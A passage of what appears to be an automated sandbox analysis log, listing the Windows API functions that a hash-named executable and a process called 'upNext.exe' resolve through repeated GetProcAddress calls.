\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004224)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowTextA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindNextUrlCacheEntryA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a 